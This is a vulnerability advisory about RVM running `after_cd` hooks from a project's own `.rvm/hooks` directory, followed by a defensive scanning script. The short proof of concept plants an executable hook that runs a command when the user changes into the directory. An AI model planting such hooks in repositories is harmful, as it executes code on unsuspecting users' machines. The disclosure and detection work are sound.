RVM automatically executes hooks...

Published: 2025-04-13
Revised: 2025-04-13

RVM, by default, hooks `cd` and automatically executes various auxiliary hooks when a user changes into a directory. The mechanics of these additional `after_cd` hooks are detailed at <https://rvm.io/workflow/hooks>. What this page fails to mention is that hooks, as of a vulnerable version, are not only loaded from `~/.rvm/hooks` but are also loaded from `$PWD/.rvm/hooks` as per the code, as of a vulnerable commit, at <https://github.com/rvm/rvm/blob/b04c0158d/scripts/hook#L23-L27>.

This behaviour can be used to achieve arbitrary command execution when a user changes into a directory with malicious contents. Note that hook files must be executable for them to be triggered.

### POC

```text
rvm@e6aeaf6d79ec:~$ mkdir -p poc/.rvm/hooks
rvm@e6aeaf6d79ec:~$ cat > poc/.rvm/hooks/after_cd_poc
#!/bin/sh
echo "Command execution as $(id)"
^D
rvm@e6aeaf6d79ec:~$ chmod a+x poc/.rvm/hooks/after_cd_poc
rvm@e6aeaf6d79ec:~$ cd poc
Command execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm)...
```
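A defensive check for the behaviour described above, as an added example that is not part of the original advisory or of RVM: it lists executable files under any `.rvm/hooks` directory in a tree (for example a freshly cloned repository) without changing into it. The function names and the constructed sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not RVM's code): review a directory tree for project-local
# RVM hook files before anyone with RVM loaded changes into it.
# Only `find` is used; nothing here runs `cd`, so it cannot trigger a hook.

# find_local_rvm_hooks ROOT
#   Prints each file inside a ".rvm/hooks" directory below ROOT that has any
#   execute bit set (the advisory notes hooks must be executable to fire).
#   Assumption: every such file is reported, whatever its name.
find_local_rvm_hooks() {
    scan_root=${1:-.}
    find "$scan_root" \( -type f -o -type l \) -path '*/.rvm/hooks/*' \
        \( -perm -100 -o -perm -010 -o -perm -001 \) -print 2>/dev/null | sort
}

# audit_checkout ROOT
#   Returns 0 when no executable local hook exists below ROOT, 1 otherwise,
#   and prints the findings on stderr for review.
audit_checkout() {
    hook_hits=$(find_local_rvm_hooks "$1")
    if [ -n "$hook_hits" ]; then
        printf 'executable RVM hook file(s) under %s:\n%s\n' "$1" "$hook_hits" >&2
        return 1
    fi
    return 0
}

# make_sample_tree
#   Builds a constructed sample in a temporary directory and prints its path:
#   poc/   has one executable hook file and one non-executable file
#   clean/ has no .rvm directory at all
make_sample_tree() {
    sample=$(mktemp -d) || return 1
    mkdir -p "$sample/poc/.rvm/hooks" "$sample/clean"
    printf '#!/bin/sh\n:\n' > "$sample/poc/.rvm/hooks/after_cd_poc"
    chmod a+x "$sample/poc/.rvm/hooks/after_cd_poc"
    printf 'not executable\n' > "$sample/poc/.rvm/hooks/after_cd_notes"
    printf '%s\n' "$sample"
}

# When called with a path argument, audit that tree and exit with its status.
if [ "$#" -gt 0 ]; then
    audit_checkout "$1"
fi
```

Invoke the script by path with the directory to inspect as its argument; a non-zero exit status means at least one executable local hook file needs review.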
